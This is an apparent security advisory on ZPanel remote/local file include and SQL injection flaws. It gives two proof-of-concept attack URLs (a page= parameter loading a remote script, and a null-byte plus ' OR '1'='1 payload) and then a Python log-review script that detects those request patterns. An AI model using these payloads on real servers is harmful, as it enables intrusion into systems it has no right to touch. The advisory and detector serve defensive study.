ZPanel Multiple SQL Injection and File Include Vulnerabilities
No exploit is required.

The following proof of concept demonstrates a remote file include for ZPanel 2.0:

http://www.example.com/zpanel/zpanel.php?page=http://[remote]/[script]

The following proof of concept demonstrates a local file include for ZPanel 2.5beta:

http://www.example.com/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1

The following exploit code was provided by 1dt.w0lf:
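
A log-review sketch for the two request patterns shown above, added here as an example; it is not the exploit code attributed to 1dt.w0lf and not part of the original advisory. The sample request lines, the host files.example.net and the rule labels are constructed, and the input is assumed to be the request line from a web server access log.

```python
import re
from urllib.parse import parse_qsl

# Rules mirror the two proof-of-concept URLs in the advisory (labels are ours).
RULES = [
    ("remote-url", re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)),  # page=http://...
    ("null-byte", re.compile(r"\x00")),                           # decoded %00
    ("sql-quote", re.compile(r"'")),                              # ' OR '1'='1
]

# Constructed sample request lines; files.example.net is a placeholder host.
SAMPLE_REQUESTS = [
    "GET /zpanel/zpanel.php?page=billinginfo/index.php HTTP/1.1",
    "GET /zpanel/zpanel.php?page=http://files.example.net/inc.txt HTTP/1.1",
    "GET /zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1 HTTP/1.1",
]


def classify(request_line):
    """Return the rule labels matched by the 'page' parameter of zpanel.php."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return []
    path, _, query = parts[1].partition("?")
    if not path.lower().endswith("/zpanel.php"):
        return []
    findings = []
    # parse_qsl percent-decodes values, so %00 and %20 are seen decoded.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != "page":
            continue
        for label, pattern in RULES:
            if pattern.search(value) and label not in findings:
                findings.append(label)
    return findings


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(classify(line) or ["clean"], line)
```

Matches are a starting point for review, since a legitimate `page` value should be a relative path with no scheme, NUL byte or quote character.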